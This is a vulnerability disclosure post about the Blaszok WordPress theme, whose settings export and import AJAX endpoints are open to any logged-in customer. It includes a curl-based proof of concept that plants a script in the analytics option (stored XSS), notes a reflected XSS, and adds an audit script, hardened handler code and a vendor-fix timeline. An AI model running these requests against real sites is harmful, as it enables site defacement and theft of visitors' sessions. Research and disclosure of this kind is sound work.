Blaszok eCommerce WordPress theme suffers from a critical security issue: exposed theme options.

Exposed Options

This type of vulnerability means that an attacker can set, update and/or read the options stored for a theme or a plugin.

A lot of premium theme and plug-in developers try to implement their own system for storing the settings and options related to the product. There are quite a few ready-made solutions that not only cut back development time but, chances are, are much more secure as well. One prime example would be the Redux framework.

Blaszok issues

I looked at the Blaszok eCommerce theme because it is listed under the eCommerce tag on ThemeForest.

I usually look at the low-hanging fruit first (wp_ajax, admin_init, unserialize, etc.), and this showed up in /themes/blaszok/panel/options-framework.php:

add_action('wp_ajax_mpcth_export_settings', 'mpcth_export_settings');  
[...]
add_action('wp_ajax_mpcth_import_settings', 'mpcth_import_settings');  

You can look at the full source code: options-framework.php
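The triage described above (find every wp_ajax_* registration, then check whether the callback verifies a nonce and a capability) can be automated. The following is an added example, not code from the theme or from the original post: a small static audit helper that pulls add_action('wp_ajax_…', 'callback') registrations out of PHP source, locates each callback body by brace matching, and reports which ones contain neither check_ajax_referer/wp_verify_nonce nor current_user_can. The sample source it scans is constructed for the demo; the hook and function names in it (demo_export, demo_import, demo_opts) are made up.

```php
<?php
// Added audit helper (not part of the Blaszok theme). Flags wp_ajax_* callbacks that
// lack a nonce check or a capability check. Heuristic only: brace matching ignores
// braces inside strings/comments, and checks done in a helper function are not seen.

function find_ajax_registrations(string $src): array {
    // Matches add_action('wp_ajax_foo', 'cb') and add_action("wp_ajax_nopriv_foo", "cb").
    preg_match_all(
        "/add_action\(\s*['\"](wp_ajax_(?:nopriv_)?\w+)['\"]\s*,\s*['\"](\w+)['\"]/",
        $src, $m, PREG_SET_ORDER
    );
    $out = [];
    foreach ($m as $hit) {
        $out[] = ['hook' => $hit[1], 'callback' => $hit[2]];
    }
    return $out;
}

function extract_function_body(string $src, string $name): ?string {
    // Find "function <name>(" and return the text from its opening "{" to the matching "}".
    if (!preg_match('/function\s+' . preg_quote($name, '/') . '\s*\(/', $src, $m, PREG_OFFSET_CAPTURE)) {
        return null;
    }
    $start = strpos($src, '{', $m[0][1]);
    if ($start === false) {
        return null;
    }
    $depth = 0;
    $len = strlen($src);
    for ($i = $start; $i < $len; $i++) {
        if ($src[$i] === '{') {
            $depth++;
        } elseif ($src[$i] === '}') {
            $depth--;
            if ($depth === 0) {
                return substr($src, $start, $i - $start + 1);
            }
        }
    }
    return null; // unbalanced braces
}

function audit_ajax_handlers(string $src): array {
    $findings = [];
    foreach (find_ajax_registrations($src) as $reg) {
        $body = extract_function_body($src, $reg['callback']);
        $hasNonce = $body !== null && preg_match('/check_ajax_referer|wp_verify_nonce/', $body) === 1;
        $hasCap   = $body !== null && preg_match('/current_user_can\s*\(/', $body) === 1;
        $findings[] = [
            'hook'       => $reg['hook'],
            'callback'   => $reg['callback'],
            'body_found' => $body !== null,
            'nonce'      => $hasNonce,
            'capability' => $hasCap,
        ];
    }
    return $findings;
}

// Constructed sample input: one handler with no checks at all, one with both.
$sample = <<<'PHP'
add_action('wp_ajax_demo_export', 'demo_export');
add_action('wp_ajax_demo_import', 'demo_import');
function demo_export() { echo json_encode(get_option('demo_opts')); wp_die(); }
function demo_import() {
    check_ajax_referer('demo_import', 'security');
    if (!current_user_can('manage_options')) { wp_die('forbidden', 403); }
    update_option('demo_opts', $_POST['opts']); wp_die();
}
PHP;

foreach (audit_ajax_handlers($sample) as $f) {
    $status = ($f['nonce'] && $f['capability']) ? 'ok' : 'REVIEW';
    printf("%-7s %-22s -> %-12s nonce=%s capability=%s\n",
        $status, $f['hook'], $f['callback'],
        $f['nonce'] ? 'yes' : 'no', $f['capability'] ? 'yes' : 'no');
}
```

Run it with `php audit.php` against the constructed sample and demo_export is reported as REVIEW (no nonce, no capability) while demo_import passes; point it at a real theme by replacing $sample with file_get_contents() of the file you are reviewing. A "REVIEW" line is a candidate, not a confirmed finding: the callback may delegate its checks to a helper, or the data it exposes may be harmless.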

Both mpcth_export_settings and mpcth_import_settings do not check for capability or a nonce. This, under normal circumstances, would be an Authenticated stored XSS or exposed theme options, but because this theme is an eCommerce theme, chances are huge that WooCommerce is installed.

And if a theme has WooCommerce, chances are big that users can register under the customer role, and after they log in as a customer they can call the mpcth_export_settings and mpcth_import_settings endpoints.

Simple POC

Export the current settings

$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' --data 'action=mpcth_export_settings' > settings.json

Edit the theme settings as needed :)

$ cat settings.json | python -m json.tool > settings_nice.json
$ vi settings_nice.json

I picked the first one, mpcth_analytics_code, which seemed pretty straightforward.

"mpcth_analytics_code": " alert('Greetings from WpHutte'); ",
[...]
"mpcth_enable_analytics": "1",

The next step is to import it:

$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' -F 'action=mpcth_import_settings' -F '[FILE_FIELD]=@settings_nice.json'

<h3>Importing...</h3><h4>All settings were imported.</h4><script>location.href = ""</script>  

As a bonus, there is a reflected XSS as well:

echo '<h4>' . __('All settings were imported.', 'mpcth') . '</h4>';
echo '<script>location.href = "' . $_REQUEST['panel_url'] . '"</script>';
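For comparison, here is how the two handlers could be wired so that the missing-capability, missing-nonce and reflected-XSS issues described above are all closed. This is an added example, not the theme's code or the vendor's 3.9.4 fix; only the hook names mpcth_export_settings / mpcth_import_settings and the option key mpcth_analytics_code come from the post. The option name mpcth_options, the nonce actions, the nonce field name security and the upload field name settings are assumptions.

```php
<?php
// Added example (not the Blaszok theme's code): hardened export/import AJAX handlers.

add_action('wp_ajax_mpcth_export_settings', 'mpcth_export_settings_secure');
add_action('wp_ajax_mpcth_import_settings', 'mpcth_import_settings_secure');
// Deliberately no wp_ajax_nopriv_* registration: anonymous visitors get no handler at all.

function mpcth_require_admin(string $nonce_action): void {
    // Nonce first: blocks CSRF against a logged-in admin. Dies with -1 on failure.
    check_ajax_referer($nonce_action, 'security');
    // Capability second: a WooCommerce "customer" has no manage_options, so the
    // logged-in-customer scenario from the post is stopped here.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient privileges'], 403);
    }
}

function mpcth_export_settings_secure(): void {
    mpcth_require_admin('mpcth_export_settings');
    wp_send_json_success(get_option('mpcth_options', []));   // option name assumed
}

function mpcth_import_settings_secure(): void {
    mpcth_require_admin('mpcth_import_settings');

    if (empty($_FILES['settings']['tmp_name']) || !is_uploaded_file($_FILES['settings']['tmp_name'])) {
        wp_send_json_error(['message' => 'No settings file uploaded'], 400);
    }
    $data = json_decode((string) file_get_contents($_FILES['settings']['tmp_name']), true);
    if (!is_array($data)) {
        wp_send_json_error(['message' => 'Settings file is not a JSON object'], 400);
    }

    // Only accept keys in the theme's namespace and sanitise values. The free-form
    // analytics snippet is the field the post abused: it is raw HTML by design, so
    // restrict it to users who already hold unfiltered_html.
    $clean = [];
    foreach ($data as $key => $value) {
        $key = sanitize_key((string) $key);
        if (strpos($key, 'mpcth_') !== 0) {
            continue;
        }
        if ($key === 'mpcth_analytics_code') {
            if (!current_user_can('unfiltered_html')) {
                continue;
            }
            $clean[$key] = is_string($value) ? $value : '';
        } else {
            $clean[$key] = is_scalar($value) ? sanitize_text_field((string) $value) : '';
        }
    }
    update_option('mpcth_options', $clean);

    // Reflected-XSS fix for the panel_url echo: never print the request value into
    // HTML. Validate it against the site's own admin area and return it as JSON; the
    // panel's JavaScript performs the redirect.
    $panel_url = isset($_POST['panel_url'])
        ? esc_url_raw(wp_unslash((string) $_POST['panel_url']))
        : admin_url('themes.php');
    if (strpos($panel_url, admin_url()) !== 0) {
        $panel_url = admin_url('themes.php');
    }
    wp_send_json_success(['message' => 'All settings were imported.', 'redirect' => $panel_url]);
}
```

The order of the two checks matters: check_ajax_referer() runs before any capability test so that a forged cross-site request never reaches the privileged branch, and current_user_can('manage_options') is evaluated on the server rather than inferred from the fact that the user is logged in. Returning JSON instead of an HTML fragment removes the echo of $_REQUEST['panel_url'] entirely, and the admin_url() prefix check keeps the redirect target on the site's own dashboard.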

Impact 4/10

The ability to edit the theme options is pretty scary, but the theme has only ~6000 sales.

Timeline

14 - 07 - 2017 - Vulnerability discovered  
15 - 07 - 2017 - Vendor notified  
26 - 07 - 2017 - Vendor fixed the issues in 3.9.4 (FIXED: Theme Options security vulnerability issue)  
14 - 08 - 2017 - Vulnerability goes public.